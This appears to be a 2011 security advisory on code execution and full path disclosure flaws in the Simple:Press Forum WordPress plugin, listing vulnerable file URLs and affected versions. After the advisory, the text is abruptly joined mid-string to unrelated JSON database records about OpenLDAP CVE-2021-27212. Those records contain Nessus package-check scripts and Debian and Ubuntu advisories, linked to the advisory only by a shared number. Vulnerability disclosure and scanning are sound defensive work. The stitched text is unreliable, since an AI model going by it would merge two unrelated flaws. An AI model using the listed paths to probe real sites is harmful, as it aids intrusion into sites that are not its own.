Code Execution and FPD vulnerabilities in Simple:Press Forum for WordPress
2011-10-24T00:00:00
ID SECURITYVULNS:DOC:27212 Type securityvulns Reporter Securityvulns Modified 2011-10-24T00:00:00
Description
Hello 3APA3A!
I want to warn you about multiple security vulnerabilities in the plugin Simple:Press Forum for WordPress.
These are Code Execution and Full Path Disclosure vulnerabilities.
Code Execution (WASC-31):
Execution of arbitrary code is possible via TinyBrowser. As I already told you concerning TinyBrowser for TinyMCE (http://securityvulns.ru/docs26660.html), the program is vulnerable to three methods of code execution.
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php
Full Path Disclosure (WASC-13):
http://site/wp-content/plugins/simple-forum/styles/icons/default/ICON_DEFAULTS.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpell.php
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpellShell.php
The last four FPD vulnerabilities are in TinyMCE, which is shipped with SPF.
There were many FPDs in old versions of SPF; some of them were already fixed in the latest version, 4.4.5. In particular, in old versions (such as 4.1.1) there are FPDs in the admin folder:
http://site/wp-content/plugins/simple-forum/admin/sfa-framework.php
http://site/wp-content/plugins/simple-forum/admin/sfa-menu.php
And in some other files in subfolders of the admin, editors and other folders. In the latest version only the five above-mentioned FPDs are left.
Simple:Press Forum 4.1.2 and previous versions are vulnerable to CE. In SPF 4.1.3, which was released on 31.12.2009, TinyBrowser was completely removed (the developers decided not to fix it themselves or wait for a fix from the developer of TinyBrowser, but simply removed it). After TinyBrowser was removed from SPF, new methods of code execution were found in this application, so users of old versions of SPF became even more vulnerable (on Apache web servers as well as on IIS).
Simple:Press 4.4.5 and previous versions are vulnerable to FPD.
I mentioned these vulnerabilities at my site:
http://websecurity.com.ua/5062/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"compat-libldap-2_3-0-2.3.37-39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"compat-libldap-2_3-0-debuginfo-2.3.37-39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openldap2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-05T19:50:33", "description": "An update of the openldap package has been released.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-03T00:00:00", "title": "Photon OS 2.0: Openldap PHSA-2021-2.0-0322", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-03-03T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:openldap"], "id": "PHOTONOS_PHSA-2021-2_0-0322_OPENLDAP.NASL", "href": "https://www.tenable.com/plugins/nessus/147001", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0322. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147001);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/04\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Photon OS 2.0: Openldap PHSA-2021-2.0-0322\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openldap package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-322.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'openldap-2.4.57-2.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openldap');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-05T19:50:34", "description": "An update of the openldap package has been released.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-03T00:00:00", "title": "Photon OS 3.0: Openldap PHSA-2021-3.0-0201", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-03-03T00:00:00", "cpe": ["cpe:/o:vmware:photonos:3.0", "p-cpe:/a:vmware:photonos:openldap"], "id": "PHOTONOS_PHSA-2021-3_0-0201_OPENLDAP.NASL", "href": "https://www.tenable.com/plugins/nessus/146999", "sourceData": "##\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0201. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146999);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/04\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Photon OS 3.0: Openldap PHSA-2021-3.0-0201\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openldap package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-201.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openldap-2.4.57-2.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openldap');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-26T10:10:29", "description": "A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. 
An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-02-23T00:00:00", "title": "Debian DSA-4860-1 : openldap - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-02-23T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:openldap"], "id": "DEBIAN_DSA-4860.NASL", "href": "https://www.tenable.com/plugins/nessus/146786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4860. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146786);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\"CVE-2021-27212\");\n script_xref(name:\"DSA\", value:\"4860\");\n\n script_name(english:\"Debian DSA-4860-1 : openldap - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. 
An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4860\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the openldap packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"ldap-utils\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap-2.4-2\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap-common\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap2-dev\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd-contrib\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd-smbk5pwd\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapi-dev\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-25T17:50:27", "description": "A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. 
An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 3, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-02-22T00:00:00", "title": "Debian DLA-2574-1 : openldap security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ldap-utils", "p-cpe:/a:debian:debian_linux:slapd", "p-cpe:/a:debian:debian_linux:libldap-common", "p-cpe:/a:debian:debian_linux:libldap-2.4-2-dbg", "p-cpe:/a:debian:debian_linux:libldap2-dev", "p-cpe:/a:debian:debian_linux:libldap-2.4-2", "p-cpe:/a:debian:debian_linux:slapd-smbk5pwd", "p-cpe:/a:debian:debian_linux:slapd-dbg", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2574.NASL", "href": "https://www.tenable.com/plugins/nessus/146667", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2574-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146667);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/24\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Debian DLA-2574-1 : openldap security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/02/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/openldap\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ldap-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-2.4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-2.4-2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd-smbk5pwd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"ldap-utils\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-2.4-2\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-2.4-2-dbg\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap-common\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libldap2-dev\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd-dbg\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"slapd-smbk5pwd\", reference:\"2.4.44+dfsg-5+deb9u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else 
security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2021-02-23T15:53:59", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "Pasi Saarinen discovered that OpenLDAP incorrectly handled certain short \ntimestamps. A remote attacker could possibly use this issue to cause \nOpenLDAP to crash, resulting in a denial of service.", "edition": 2, "modified": "2021-02-22T00:00:00", "published": "2021-02-22T00:00:00", "id": "USN-4744-1", "href": "https://ubuntu.com/security/notices/USN-4744-1", "title": "OpenLDAP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-02-24T01:18:25", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2574-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nFebruary 21, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : openldap\nVersion : 2.4.44+dfsg-5+deb9u8\nCVE ID : CVE-2021-27212\n\nA vulnerability in the Certificate List Exact Assertion validation\nwas discovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. 
An unauthenticated remote attacker can\ntake advantage of this flaw to cause a denial of service (slapd\ndaemon crash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2021-02-20T18:56:09", "published": "2021-02-20T18:56:09", "id": "DEBIAN:DLA-2574-1:CF471", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202102/msg00035.html", "title": "[SECURITY] [DLA 2574-1] openldap security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-24T01:30:06", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27212"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4860-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nFebruary 20, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openldap\nCVE ID : CVE-2021-27212\n\nA vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. 
An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon crash)\nvia specially crafted packets.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u6.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2021-02-20T13:01:20", "published": "2021-02-20T13:01:20", "id": "DEBIAN:DSA-4860-1:4287F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00041.html", "title": "[SECURITY] [DSA 4860-1] openldap security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}